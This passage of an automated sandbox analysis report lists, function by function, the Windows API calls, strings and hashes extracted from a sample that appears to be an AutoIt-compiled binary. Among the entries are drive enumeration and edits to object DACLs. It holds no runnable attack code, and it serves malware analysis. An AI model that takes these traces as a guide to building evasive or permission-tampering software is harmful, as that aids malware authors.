            • Instruction Fuzzy Hash: 538156739090A349DB6942398675A3EFFE17E933B1319079DD4F2CA5C2ED248574F620
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9e717cb87a9a0226c9987cfa4e6a103138804cdcc6388f03ab2cf31e6de52068
            • Instruction ID: c36b39806391e75fa300b5e0a9848ce2d314ec7fa4879b7829aa1241769e818b
            • Opcode Fuzzy Hash: 9e717cb87a9a0226c9987cfa4e6a103138804cdcc6388f03ab2cf31e6de52068
            • Instruction Fuzzy Hash: 7421A5326206118BD728CE79C92267A73E5A754210F25866EE4E7D37C5DE3AA904CB80
            APIs
            • DeleteObject.GDI32(00000000), ref: 01022B30
            • DeleteObject.GDI32(00000000), ref: 01022B43
            • DestroyWindow.USER32 ref: 01022B52
            • GetDesktopWindow.USER32 ref: 01022B6D
            • GetWindowRect.USER32(00000000), ref: 01022B74
            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 01022CA3
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01022CB1
            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022CF8
            • GetClientRect.USER32(00000000,?), ref: 01022D04
            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01022D40
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D62
            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D75
            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D80
            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D89
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022D98
            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DA1
            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DA8
            • GlobalFree.KERNEL32(00000000), ref: 01022DB3
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022DC5
            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0103FC38,00000000), ref: 01022DDB
            • GlobalFree.KERNEL32(00000000), ref: 01022DEB
            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 01022E11
            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 01022E30
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01022E52
            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0102303F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
            • String ID: $AutoIt v3$DISPLAY$static
            • API String ID: 2211948467-2373415609
            • Opcode ID: c9f05a5b4b9fce61898ba52ca284bc799086a62334efd65cea1ce00ab111fa6b
            • Instruction ID: 0c5d4036d6c599c0b2fd295a2fd1942fe6f2335ad28cc73d2a2b323ab88e33b2
            • Opcode Fuzzy Hash: c9f05a5b4b9fce61898ba52ca284bc799086a62334efd65cea1ce00ab111fa6b
            • Instruction Fuzzy Hash: 58028D71900214AFEB24DFA4CD89EAE7BB9FF49310F048159F955EB295C739AD00CB60
            APIs
            • SetTextColor.GDI32(?,00000000), ref: 0103712F
            • GetSysColorBrush.USER32(0000000F), ref: 01037160
            • GetSysColor.USER32(0000000F), ref: 0103716C
            • SetBkColor.GDI32(?,000000FF), ref: 01037186
            • SelectObject.GDI32(?,?), ref: 01037195
            • InflateRect.USER32(?,000000FF,000000FF), ref: 010371C0
            • GetSysColor.USER32(00000010), ref: 010371C8
            • CreateSolidBrush.GDI32(00000000), ref: 010371CF
            • FrameRect.USER32(?,?,00000000), ref: 010371DE
            • DeleteObject.GDI32(00000000), ref: 010371E5
            • InflateRect.USER32(?,000000FE,000000FE), ref: 01037230
            • FillRect.USER32(?,?,?), ref: 01037262
            • GetWindowLongW.USER32(?,000000F0), ref: 01037284
              • Part of subcall function 010373E8: GetSysColor.USER32(00000012), ref: 01037421
              • Part of subcall function 010373E8: SetTextColor.GDI32(?,?), ref: 01037425
              • Part of subcall function 010373E8: GetSysColorBrush.USER32(0000000F), ref: 0103743B
              • Part of subcall function 010373E8: GetSysColor.USER32(0000000F), ref: 01037446
              • Part of subcall function 010373E8: GetSysColor.USER32(00000011), ref: 01037463
              • Part of subcall function 010373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 01037471
              • Part of subcall function 010373E8: SelectObject.GDI32(?,00000000), ref: 01037482
              • Part of subcall function 010373E8: SetBkColor.GDI32(?,00000000), ref: 0103748B
              • Part of subcall function 010373E8: SelectObject.GDI32(?,?), ref: 01037498
              • Part of subcall function 010373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 010374B7
              • Part of subcall function 010373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010374CE
              • Part of subcall function 010373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 010374DB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
            • String ID:
            • API String ID: 4124339563-0
            • Opcode ID: 326a934dafa9eccbaa91068987b5a2a03defe5f5922b5975af1a597408993399
            • Instruction ID: 75a934ab43d19881bb683fd5fd3378dca81d9ff52e0f0bf869528a5bd3ee5165
            • Opcode Fuzzy Hash: 326a934dafa9eccbaa91068987b5a2a03defe5f5922b5975af1a597408993399
            • Instruction Fuzzy Hash: 8BA19272008301AFE7119F64DD48A5B7BEDFB89320F100A1AFAE2E61D0D776D544CB51
            APIs
            • DestroyWindow.USER32(?,?), ref: 00FB8E14
            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FF6AC5
            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FF6AFE
            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FF6F43
              • Part of subcall function 00FB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB8BE8,?,00000000,?,?,?,?,00FB8BBA,00000000,?), ref: 00FB8FC5
            • SendMessageW.USER32(?,00001053), ref: 00FF6F7F
            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FF6F96
            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF6FAC
            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00FF6FB7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
            • String ID: 0
            • API String ID: 2760611726-4108050209
            • Opcode ID: 8d44db35e2e534e02a296aff132cd5f159b789b893dc7165cdc6faca2590046f
            • Instruction ID: 022440b2bf629bb5534550745495fa4750d37fad6da68a9ecee3e1ca077e6316
            • Opcode Fuzzy Hash: 8d44db35e2e534e02a296aff132cd5f159b789b893dc7165cdc6faca2590046f
            • Instruction Fuzzy Hash: EC12AD31A00205AFD725DF14C984BB9BBA9FF88320F144469F695DB2A1CB36EC52EF51
            APIs
            • DestroyWindow.USER32(00000000), ref: 0102273E
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0102286A
            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 010228A9
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 010228B9
            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 01022900
            • GetClientRect.USER32(00000000,?), ref: 0102290C
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 01022955
            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01022964
            • GetStockObject.GDI32(00000011), ref: 01022974
            • SelectObject.GDI32(00000000,00000000), ref: 01022978
            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 01022988
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01022991
            • DeleteDC.GDI32(00000000), ref: 0102299A
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010229C6
            • SendMessageW.USER32(00000030,00000000,00000001), ref: 010229DD
            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 01022A1D
            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01022A31
            • SendMessageW.USER32(00000404,00000001,00000000), ref: 01022A42
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 01022A77
            • GetStockObject.GDI32(00000011), ref: 01022A82
            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01022A8D
            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 01022A97
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
            • API String ID: 2910397461-517079104
            • Opcode ID: eb5999f88ba8a6bade3fde64d5c82d6594fc3adafdbf084bfa05709f7076b04b
            • Instruction ID: 430dc1147744dcad962ee987b28d8fb5d91e4a7f1e0bf9446020dba5a66dedee
            • Opcode Fuzzy Hash: eb5999f88ba8a6bade3fde64d5c82d6594fc3adafdbf084bfa05709f7076b04b
            • Instruction Fuzzy Hash: 2FB17FB1A00215AFEB24DFA8CD85FAE7BA9FB09710F008155F954E72D0D779E940CB50
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 01014AED
            • GetDriveTypeW.KERNEL32(?,0103CB68,?,\\.\,0103CC08), ref: 01014BCA
            • SetErrorMode.KERNEL32(00000000,0103CB68,?,\\.\,0103CC08), ref: 01014D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$DriveType
            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
            • API String ID: 2907320926-4222207086
            • Opcode ID: 23c417b5704f45ee83a45124de9692db4598867f25a949f3d64ab3f907e94d69
            • Instruction ID: 10fb8095f4d3339bff49e963af379463bf507fcd17dad0ef1887ad21763fadc0
            • Opcode Fuzzy Hash: 23c417b5704f45ee83a45124de9692db4598867f25a949f3d64ab3f907e94d69
            • Instruction Fuzzy Hash: FF61F570A0410ADFCB44EF28CA81D7C77E5BB56340B144059F886EB269CB7EDD85CB41
            APIs
            • GetSysColor.USER32(00000012), ref: 01037421
            • SetTextColor.GDI32(?,?), ref: 01037425
            • GetSysColorBrush.USER32(0000000F), ref: 0103743B
            • GetSysColor.USER32(0000000F), ref: 01037446
            • CreateSolidBrush.GDI32(?), ref: 0103744B
            • GetSysColor.USER32(00000011), ref: 01037463
            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 01037471
            • SelectObject.GDI32(?,00000000), ref: 01037482
            • SetBkColor.GDI32(?,00000000), ref: 0103748B
            • SelectObject.GDI32(?,?), ref: 01037498
            • InflateRect.USER32(?,000000FF,000000FF), ref: 010374B7
            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 010374CE
            • GetWindowLongW.USER32(00000000,000000F0), ref: 010374DB
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0103752A
            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 01037554
            • InflateRect.USER32(?,000000FD,000000FD), ref: 01037572
            • DrawFocusRect.USER32(?,?), ref: 0103757D
            • GetSysColor.USER32(00000011), ref: 0103758E
            • SetTextColor.GDI32(?,00000000), ref: 01037596
            • DrawTextW.USER32(?,010370F5,000000FF,?,00000000), ref: 010375A8
            • SelectObject.GDI32(?,?), ref: 010375BF
            • DeleteObject.GDI32(?), ref: 010375CA
            • SelectObject.GDI32(?,?), ref: 010375D0
            • DeleteObject.GDI32(?), ref: 010375D5
            • SetTextColor.GDI32(?,?), ref: 010375DB
            • SetBkColor.GDI32(?,?), ref: 010375E5
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
            • String ID:
            • API String ID: 1996641542-0
            • Opcode ID: 4074749405e417deb460d4df7379be300ea587cb4042ca86ee502bc9e01e8bbf
            • Instruction ID: c89fabb637eccf842dfaadd9ad0c92b1cda5c236a634f9faecc7756939a0cb90
            • Opcode Fuzzy Hash: 4074749405e417deb460d4df7379be300ea587cb4042ca86ee502bc9e01e8bbf
            • Instruction Fuzzy Hash: 0C619E72900218AFEF119FA8DC49AEE7FBDEB09320F104512FA51FB291D7759940DB90
            APIs
            • GetCursorPos.USER32(?), ref: 01031128
            • GetDesktopWindow.USER32 ref: 0103113D
            • GetWindowRect.USER32(00000000), ref: 01031144
            • GetWindowLongW.USER32(?,000000F0), ref: 01031199
            • DestroyWindow.USER32(?), ref: 010311B9
            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 010311ED
            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0103120B
            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0103121D
            • SendMessageW.USER32(00000000,00000421,?,?), ref: 01031232
            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 01031245
            • IsWindowVisible.USER32(00000000), ref: 010312A1
            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 010312BC
            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 010312D0
            • GetWindowRect.USER32(00000000,?), ref: 010312E8
            • MonitorFromPoint.USER32(?,?,00000002), ref: 0103130E
            • GetMonitorInfoW.USER32(00000000,?), ref: 01031328
            • CopyRect.USER32(?,?), ref: 0103133F
            • SendMessageW.USER32(00000000,00000412,00000000), ref: 010313AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
            • String ID: ($0$tooltips_class32
            • API String ID: 698492251-4156429822
            • Opcode ID: 0d5d0b755a14e09b906169dbb3f776ace0fa7fd4e83fff9cf67dd68aa24858c0
            • Instruction ID: 4d054c7cf1e59084c1bc53cfb41cd2c20867bd3dd21ba2273bbd9f9002f5b70e
            • Opcode Fuzzy Hash: 0d5d0b755a14e09b906169dbb3f776ace0fa7fd4e83fff9cf67dd68aa24858c0
            • Instruction Fuzzy Hash: E5B1AE71608341AFD750DF64C984BAEBBE8FF89350F048959F9D9AB292C771E804CB91
            APIs
            • CharUpperBuffW.USER32(?,?), ref: 010302E5
            • _wcslen.LIBCMT ref: 0103031F
            • _wcslen.LIBCMT ref: 01030389
            • _wcslen.LIBCMT ref: 010303F1
            • _wcslen.LIBCMT ref: 01030475
            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 010304C5
            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 01030504
              • Part of subcall function 00FBF9F2: _wcslen.LIBCMT ref: 00FBF9FD
              • Part of subcall function 0100223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01002258
              • Part of subcall function 0100223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0100228A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$MessageSend$BuffCharUpper
            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
            • API String ID: 1103490817-719923060
            • Opcode ID: 496673aaa8150fc089d960234283e9a6075e8231766744805784de5bfb6e5c9f
            • Instruction ID: 8f89281fa036b45e3664bb0f7a651399f6c9150d93e00a8ae719e14857445d97
            • Opcode Fuzzy Hash: 496673aaa8150fc089d960234283e9a6075e8231766744805784de5bfb6e5c9f
            • Instruction Fuzzy Hash: F3E1CF712152018FC714DF28C95096EB7EABFC8318F14899CF8D69B2AADB34ED45CB41
            APIs
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB8968
            • GetSystemMetrics.USER32(00000007), ref: 00FB8970
            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00FB899B
            • GetSystemMetrics.USER32(00000008), ref: 00FB89A3
            • GetSystemMetrics.USER32(00000004), ref: 00FB89C8
            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00FB89E5
            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00FB89F5
            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00FB8A28
            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00FB8A3C
            • GetClientRect.USER32(00000000,000000FF), ref: 00FB8A5A
            • GetStockObject.GDI32(00000011), ref: 00FB8A76
            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB8A81
              • Part of subcall function 00FB912D: GetCursorPos.USER32(?), ref: 00FB9141
              • Part of subcall function 00FB912D: ScreenToClient.USER32(00000000,?), ref: 00FB915E
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000001), ref: 00FB9183
              • Part of subcall function 00FB912D: GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            • SetTimer.USER32(00000000,00000000,00000028,00FB90FC), ref: 00FB8AA8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
            • String ID: AutoIt v3 GUI
            • API String ID: 1458621304-248962490
            • Opcode ID: cc20b7e558811e32662611b3607119d51f711ec7e9d936ba48dabd16b2afa2f2
            • Instruction ID: efd84b204816e72d1682b95c000d6f6cf489d8bc3b7537971827dfe824b0838a
            • Opcode Fuzzy Hash: cc20b7e558811e32662611b3607119d51f711ec7e9d936ba48dabd16b2afa2f2
            • Instruction Fuzzy Hash: 7BB17C71A0020AAFDB24DF69C945BEA3BB8FB48314F10421AFA55E72D4DB79A841DF50
            APIs
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
              • Part of subcall function 010010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
              • Part of subcall function 010010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
              • Part of subcall function 010010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01000DF5
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01000E29
            • GetLengthSid.ADVAPI32(?), ref: 01000E40
            • GetAce.ADVAPI32(?,00000000,?), ref: 01000E7A
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01000E96
            • GetLengthSid.ADVAPI32(?), ref: 01000EAD
            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01000EB5
            • HeapAlloc.KERNEL32(00000000), ref: 01000EBC
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01000EDD
            • CopySid.ADVAPI32(00000000), ref: 01000EE4
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01000F13
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01000F35
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01000F47
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F6E
            • HeapFree.KERNEL32(00000000), ref: 01000F75
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F7E
            • HeapFree.KERNEL32(00000000), ref: 01000F85
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000F8E
            • HeapFree.KERNEL32(00000000), ref: 01000F95
            • GetProcessHeap.KERNEL32(00000000,?), ref: 01000FA1
            • HeapFree.KERNEL32(00000000), ref: 01000FA8
              • Part of subcall function 01001193: GetProcessHeap.KERNEL32(00000008,01000BB1,?,00000000,?,01000BB1,?), ref: 010011A1
              • Part of subcall function 01001193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01000BB1,?), ref: 010011A8
              • Part of subcall function 01001193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01000BB1,?), ref: 010011B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
            • String ID:
            • API String ID: 4175595110-0
